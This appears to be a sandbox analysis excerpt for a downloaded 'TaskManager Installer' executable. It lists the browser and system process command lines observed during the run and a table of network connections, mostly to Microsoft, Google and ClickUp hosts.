"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6028,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6012 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6048,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5976 /prefetch:14

C:\Users\Admin\Downloads\TaskManager Installer.exe

"C:\Users\Admin\Downloads\TaskManager Installer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x2c0,0x7fff496ef208,0x7fff496ef214,0x7fff496ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3416,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4864,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4868,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4924 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5536,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5616,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5616,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5916,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5636,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6332,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6652,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6664 /prefetch:14

C:\Users\Admin\Downloads\TaskManager Installer (1).exe

"C:\Users\Admin\Downloads\TaskManager Installer (1).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6680,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6096,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6092,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6116,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6120,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6244 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7736,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7632,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7676,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5004,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8024,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7364,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7664 /prefetch:12

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5052,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=8368,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8524 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x000000000000049C 0x00000000000004DC

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8824,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8820 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8664,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=9088,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9820 /prefetch:10

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8388,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10264,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=10372 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=9916,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9996,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=11016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10332,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=10328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5544,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9964 /prefetch:14

Network

Country Destination Domain Proto
GB 2.18.66.168:443 tcp
US 13.89.179.10:443 browser.pipe.aria.microsoft.com tcp
GB 2.16.34.97:443 www.bing.com tcp
GB 142.250.200.35:80 c.pki.goog tcp
US 13.107.253.64:443 fb-unicast.msedge.net tcp
US 150.171.22.254:443 ln-ring.msedge.net tcp
US 40.112.186.181:443 2edac930e2ea4f4947825be171549364.azr.footprintdns.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 216.58.204.78:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
US 150.171.69.254:443 mcr-ring.msedge.net tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 172.202.64.254:443 arc-ring.msedge.net tcp
GB 2.18.66.168:443 tcp
US 13.107.3.254:443 s-ring.msedge.net tcp
US 20.140.56.69:443 fp-afd.azureedge.us tcp
US 13.89.179.10:443 browser.pipe.aria.microsoft.com tcp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 tunnel.googlezip.net udp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 142.250.179.238:443 consent.google.com tcp
GB 108.138.233.77:443 clickup.com tcp
GB 108.138.233.77:443 clickup.com tcp
GB 108.138.233.77:443 clickup.com udp
US 151.101.129.229:443 cdn.jsdelivr.net tcp
US 104.18.86.42:443 cdn.cookielaw.org tcp
US 104.18.86.42:443 cdn.cookielaw.org tcp
US 151.101.129.91:443 cdn.growthbook.io tcp
US 172.64.155.119:443 clickup-privacy.my.onetrust.com tcp
GB 108.138.233.77:443 clickup.com udp
GB 18.244.179.43:443 api.clickup.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
US 172.64.155.119:443 clickup-privacy.my.onetrust.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 20.189.173.11:443 browser.events.data.microsoft.com tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
US 52.240.245.68:443 northcentralus-0.in.applicationinsights.azure.com tcp
US 20.189.173.11:443 browser.events.data.microsoft.com tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
GB 2.18.66.97:443 purchase.mp.microsoft.com tcp
GB 2.18.66.97:443 purchase.mp.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 apps.microsoft.com udp
US 8.8.8.8:53 apps.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.21.239:80 edge.microsoft.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
GB 104.86.110.107:443 www.bing.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 images-eds-ssl.xboxlive.com udp
US 8.8.8.8:53 images-eds-ssl.xboxlive.com udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 musicart.xboxlive.com udp
US 8.8.8.8:53 musicart.xboxlive.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 8.8.8.8:53 store-images.microsoft.com udp
US 8.8.8.8:53 store-images.microsoft.com udp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 www.clarity.ms udp
US 8.8.8.8:53 www.clarity.ms udp
US 13.107.246.64:443 www.clarity.ms tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 40.126.31.131:443 login.microsoftonline.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 40.126.31.67:443 login.microsoftonline.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 13.107.246.64:443 www.clarity.ms tcp
US 8.8.8.8:53 northcentralus-0.in.applicationinsights.azure.com udp
US 8.8.8.8:53 northcentralus-0.in.applicationinsights.azure.com udp
US 52.240.245.67:443 northcentralus-0.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
GB 2.18.66.168:443 tcp
US 13.107.246.64:443 www.clarity.ms tcp
US 13.107.213.254:443 t-ring-s2.msedge.net tcp
SE 51.12.13.90:443 4c6602e41398645563de4f3ed1b4e68b.azr.footprintdns.com tcp
US 8.8.8.8:53 get.microsoft.com udp
US 8.8.8.8:53 get.microsoft.com udp
US 13.107.246.64:443 get.microsoft.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
